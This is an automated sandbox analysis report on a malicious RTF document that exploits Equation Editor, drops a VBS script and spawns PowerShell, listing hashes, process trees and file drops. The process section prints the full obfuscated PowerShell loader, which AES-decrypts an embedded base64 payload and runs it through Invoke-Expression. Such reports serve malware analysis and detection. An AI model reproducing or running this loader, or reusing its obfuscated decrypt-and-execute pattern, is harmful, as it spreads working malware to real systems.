Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
20-07-2024 09:50
Static task
static1
Behavioral task
behavioral1
Sample
5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
Resource
win10v2004-20240709-en
General
-
Target
5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf
-
Size
90KB
-
MD5
e677d8183d89a410a3ce59db5a2722d3
-
SHA1
969255020b8e5b9cf16ffa6dd7c8f931e7b68ce7
-
SHA256
5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2
-
SHA512
8f7369c3de05953613c246a1312a6ccfb6c416e458ddd55efdfb96c0ef569832aea51a52527fbfd5f7c36e1613c59358c425e5d8cdbf51d5bf4fb63a2bc16cc5
-
SSDEEP
384:Vgn/TJl/8FdlK+gqigv0C7xAlEM5jUbTMbyi9thdIhFRi2mnk0PKk6Ut6jvWdlKv:YuF22+iM5jZbyShdIjFJu2
Malware Config
Signatures
-
Blocklisted process makes network request 7 IoCs
Processes:
EQNEDT32.EXEWScript.exepowershell.exeflow pid process 4 2516 EQNEDT32.EXE 7 2832 WScript.exe 9 2832 WScript.exe 11 2668 powershell.exe 12 2668 powershell.exe 13 2668 powershell.exe 14 2668 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 2444 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 2444 WINWORD.EXE 2444 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
EQNEDT32.EXEWScript.exeWINWORD.EXEdescription pid process target process PID 2516 wrote to memory of 2832 2516 EQNEDT32.EXE WScript.exe PID 2516 wrote to memory of 2832 2516 EQNEDT32.EXE WScript.exe PID 2516 wrote to memory of 2832 2516 EQNEDT32.EXE WScript.exe PID 2516 wrote to memory of 2832 2516 EQNEDT32.EXE WScript.exe PID 2832 wrote to memory of 2668 2832 WScript.exe powershell.exe PID 2832 wrote to memory of 2668 2832 WScript.exe powershell.exe PID 2832 wrote to memory of 2668 2832 WScript.exe powershell.exe PID 2832 wrote to memory of 2668 2832 WScript.exe powershell.exe PID 2444 wrote to memory of 2772 2444 WINWORD.EXE splwow64.exe PID 2444 wrote to memory of 2772 2444 WINWORD.EXE splwow64.exe PID 2444 wrote to memory of 2772 2444 WINWORD.EXE splwow64.exe PID 2444 wrote to memory of 2772 2444 WINWORD.EXE splwow64.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5705cdd93bd849acc4bfc1a9a2fa9b4c6f9e4b1dd1dbd43b0e8b35c32519d6d2.rtf"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBS"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI49958097433743076509724959814142CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIbxuRBZW58D6qHa6OaTz/wPo2erEU3a8XHWrkXAdbdzTC5T84fuiWq58k3i/POU4yNFit1HabT7Ip/uUGVBt4z8Uo7htAUUgjHEN/nsapjY6CPUspvGVUGHssU+Pr5nnVpAZRUrtIGtx098n/onUN4/9UdxjeWta56320IcuEKx5FBRF8BN5agrfzcPl8nWFJaCYbxALQD0pd8wcDcG7Z4qp//WpU8YzhhoHcmfr6tHPpzTEfbrZwiVOvuw+/JvzsrMeYk7zZu+UUshFBQ5tqcmHnYcNcKNeVyySh7vbF4dtVBPC59rcDf45Ip8e8qgnf+f59F72C6X8w7BKmWcxDrvkgIJEdDAL8hj2Jkhtpz0sR4L4aVrWtEQPJ8yxgXf1T2rm+XpdfVfU+ukTx19Jz3wEIAgQSafjf0GfBAL3e4NWDVLet9944vxSiJB8xEd7JenGiyEOtI3Y3hprPXCw66eWQhoF3a145gY3Z2R4BogKZJ5gqp0EKkBqBT9JxAuN4bfZO+TSndIjmga9njg4/qNNYfeYV/uMRKhd+jYkkLNLrx6xGX9qi7fRuFbBprznkr12YuC7yJFQ2x0WsaX8X99Ti2tR/xVNE4EhJ7YWvD7ep2zjQ2woL0IBVZZWRC5I63PpIH400MNDUg8N135wf5JXMORFTBbnzE6SBNiXK6moSaSigUyIRhCN3MyxeECsYo51cbZ/6yqA6VLl9UwtSXFZkT6jsXN4VfMfanH4oR0pi+fnhBmdC+kor0H1eu3doM8tnX5jwkbA3g5RpVHVTwpCCiK/Odz2S8a2CmmJm46STR0hWNzn3oQo1Kld1xQ+1H8hCRSAJvVgqx0wbyv5ng74HSF/sOKduVg5TOulc0bAM2XZNa3NBd2k22BRcCPbE8qhywR0mDi7halZQFXAg8MkRAO0IpVULqcOhikrF+vgmdDw5nxwkSQghmqNulszxeC3Zk9uOC9fO9U2Om796d5NxN0o1Pe2Q7NqhzvPLHu7e5uzSTM6IOxVwRS1jI2X4kkSFKPx5pphUxpLEKB7kQwodoqK5/vSNq9DQIjN4kBA2oWI4BLdmL0+z+59rwTBW487/tVZMEyOa07ecYQeUh66aUseTs5+7zOjmEKrPtKQvkMDJnbAJKX385iV8MzoKGDBarEeSHT3Juol3DEq2A8RWkZdNDTL9gnFsG8rzPUewwTYqHynUuMh5CvZ/ZY0xv/HckoVxNKNGiY5Lzzih8SGOjMqMrXQPiaM+gvZbG3wf2VQkwyAEOH5p54L4m5O5omGT+jAdZzINuqShbK3l0wnwvp/1xtT8MQUezvxMnbqY70jjYLzsmxU+mqfUDhefKjgph7AlvQ909Z5XJmZnneYUGHW/2eWRp9MDZ+jWBNcUhGoUshHAdJ9QTrZSjBiXRG6ahqVSqrmyPd9m1isTmsd2uwpnR/Vv3sDR0Rpa6wRvf3FwwoHMJu7X9zC+Tub3ZCRtEYLoN5hNYt4Ci5ibCNjKAfPWHRBkhpXGJ4vxdNdesz33k4eAkMZFnBRlmUTdq+SY9gKxwq+9Pt2oCH8n9g9JSH93H57AAoPSteAmN+kM8YADHtLsjfKI1n/gboID0K3ci8Im+jLfaq/isIkAQtaFeepycXL9kn3HexD3NbJAn6fY0OQ8fIAKm2bi+W0vdvcXgrjypy+pLfd9B7bUz22aDOxkoZTFdRt1nVGbdgC2CCcFMLqM+ONKbDKmg2i1b2PUwPHKEMYrCPj33PxTJx0uYF6FcTqZWr1FunIOIXGkRF6YnlxA91J0qtZED4hJCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1VX38S3F\paste1[1].txtFilesize
156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotmFilesize
19KB
MD5fa2e9509d2e34b1ad4246bb165e5ff58
SHA1c4f1c6f094b89100d681e5d2d4ea2bc805ef7765
SHA256b406ca3dbab64096e692b58b794bf3759f8bf18a8da2e5b279340df0672ad36e
SHA512cbbe3d29656ba2aeec427f4f8fe23256997962e78e50a4223e2e104c44b29eae489c34eb5a5aa9b80d3ab88c82db92dc905df8edd253289a12313768fe8dc57c
-
C:\Users\Admin\AppData\Roaming\butterburnverysweetgirleate.vBSFilesize
123KB
MD5612b79418bc9dee5e9bf503df55a245c
SHA18211185d8e6f152a269325a6cb30c361fcbb60b3
SHA256154365daa42baad94fe2c6de17859212e407767de8f9e8e12c69b9623b63a7a0
SHA51205ef1aebdd3b9f2255f7d198c18d498e5b021f89444a8679a84fc6d01e61720e1af7216444231aff52ea3811fb12715f1ac556dd7347346f9a2c12eb27a5fb02
-
memory/2444-0-0x000000002FA21000-0x000000002FA22000-memory.dmpFilesize
4KB
-
memory/2444-1-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2444-2-0x00000000713BD000-0x00000000713C8000-memory.dmpFilesize
44KB
-
memory/2444-38-0x00000000713BD000-0x00000000713C8000-memory.dmpFilesize
44KB
-
memory/2444-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2668-36-0x0000000005540000-0x0000000005592000-memory.dmpFilesize
328KB
-
memory/2668-37-0x00000000028A0000-0x00000000028B5000-memory.dmpFilesize
84KB